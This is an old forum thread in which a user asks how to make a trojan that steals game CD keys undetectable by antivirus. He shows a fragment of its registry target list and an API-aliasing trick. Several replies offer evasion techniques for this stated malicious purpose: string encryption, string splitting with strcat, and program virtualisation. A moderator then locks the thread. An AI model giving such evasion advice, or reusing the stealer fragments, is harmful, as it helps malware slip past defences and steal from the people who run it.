| View previous topic :: View next topic |
| Author |
Message |
TheStealthMan How do I cheat?
Reputation: 0
Joined: 17 Sep 2009 Posts: 7
|
Posted: Thu Sep 17, 2009 11:34 am Post subject: [C++] need help |
|
|
hi.
i just want to know how to change detected string in C++ like we do in vb6 and vb.net.
like
DETECTED
| Code: |
Public Declare Function GetAsyncKeyState Lib "user32" (ByVal key As Long) As Integer
|
UNDETECTED
| Code: |
Public Declare Function UNDETECTEDSTIRNG Lib "user32" Alias "GetAsyncKeyState" (ByVal key As Long) As Integer
|
there is an exemple
this is detected
| Code: |
#ifndef NO_CDKEYS
//globals
REGKEYS regkeys[]={
{HKEY_CURRENT_USER,"Software\\Valve\\CounterStrike\\Settings","CDKey","Counter-Strike (Retail)",NULL,NULL},
|
so what should i change to make it undetected by antivirus ? ( 80% detect it as hacktool )
big thanks
|
|
| Back to top |
|
 |
Noz3001 I'm a spammer
Reputation: 26
Joined: 29 May 2006 Posts: 6220 Location: /dev/null
|
Posted: Thu Sep 17, 2009 12:15 pm Post subject: |
|
|
| Encrypt it and decrypt it when you need to use it.
|
|
| Back to top |
|
 |
Slugsnack Grandmaster Cheater Supreme
Reputation: 71
Joined: 24 Jan 2007 Posts: 1857
|
Posted: Thu Sep 17, 2009 2:24 pm Post subject: |
|
|
| try changing the string for example. so it is 2 strings, and you append them together
|
|
| Back to top |
|
 |
&Vage Grandmaster Cheater Supreme
Reputation: 0
Joined: 25 Jul 2008 Posts: 1053
|
Posted: Thu Sep 17, 2009 2:52 pm Post subject: |
|
|
| You can try virtualizing the program.
|
|
| Back to top |
|
 |
Noz3001 I'm a spammer
Reputation: 26
Joined: 29 May 2006 Posts: 6220 Location: /dev/null
|
Posted: Thu Sep 17, 2009 2:59 pm Post subject: |
|
|
| void:] wrote: | | You can try virtualizing the program. |
Haha. Overkill!
|
|
| Back to top |
|
 |
&Vage Grandmaster Cheater Supreme
Reputation: 0
Joined: 25 Jul 2008 Posts: 1053
|
Posted: Thu Sep 17, 2009 3:04 pm Post subject: |
|
|
| Noz3001 wrote: | | void:] wrote: | | You can try virtualizing the program. |
Haha. Overkill! | I have no clue if it works. :/ Just a suggestion...
|
|
| Back to top |
|
 |
TheStealthMan How do I cheat?
Reputation: 0
Joined: 17 Sep 2009 Posts: 7
|
Posted: Thu Sep 17, 2009 3:22 pm Post subject: |
|
|
meh... i forgot to say ... in a NEWBIE with C++...
i just got able to compile with no error so im happy.
i have 3 source code with some thing detected.
GameKeyStealer priv8 v2.1 ( the one i said as exemple )
ri0t bot ( sent to my friend and deleted when he told me what it was )
and a hack for BF2 only commander hack ( still detected as hacktool/suspect tool )
so
what " 2 string " ???
help me
the GameKeyStealer is like a trojan. we create server and send it to poeple , connect to the server , and get some game key. if its detected as hacktool from 18/22 antivirus , its useless so i need tio make it undetected.
crypter is useless because they are ALL detected.
i repeat , i have source code so it should be easier to change the code then making a UD crypter lol
thank
Last edited by TheStealthMan on Thu Sep 17, 2009 3:25 pm; edited 1 time in total |
|
| Back to top |
|
 |
Slugsnack Grandmaster Cheater Supreme
Reputation: 71
Joined: 24 Jan 2007 Posts: 1857
|
Posted: Thu Sep 17, 2009 3:23 pm Post subject: |
|
|
| void:] wrote: | | Noz3001 wrote: | | void:] wrote: | | You can try virtualizing the program. |
Haha. Overkill! | I have no clue if it works. :/ Just a suggestion... |
Yes, it would work. Try virtualising a string in your program then open it up in OllyDbg and see if you can still find that string anywhere in memory
| TheStealthMan wrote: | meh... i forgot to say ... in a NEWBIE with C++...
i just got able to compile with no error so im happy.
i have 3 source code with some thing detected.
GameKeyStealer priv8 v2.1 ( the one i said as exemple )
ri0t bot ( sent to my friend and deleted when he told me what it was )
and a hack for BF2 only commander hack ( still detected as hacktool/suspect tool )
so
what " 2 string " ???
help me
the GameKeyStealer is like a trojan. we create server and send it to poeple , connect to the server , and get some game key. if its detected as hacktool from 18/22 antivirus , its useless so i need tio make it undetected.
crypter is useless because they are ALL detected.
thank |
strcat()/wcscat()
|
|
| Back to top |
|
 |
hcavolsdsadgadsg I'm a spammer
Reputation: 26
Joined: 11 Jun 2007 Posts: 5801
|
Posted: Thu Sep 17, 2009 3:34 pm Post subject: |
|
|
I don't like where this thread is going.
Stealing CD keys is a dick move. (even if they are dumb enough to run your files)
Locking, you'll get no help with anything malicious.
|
|
| Back to top |
|
 |
|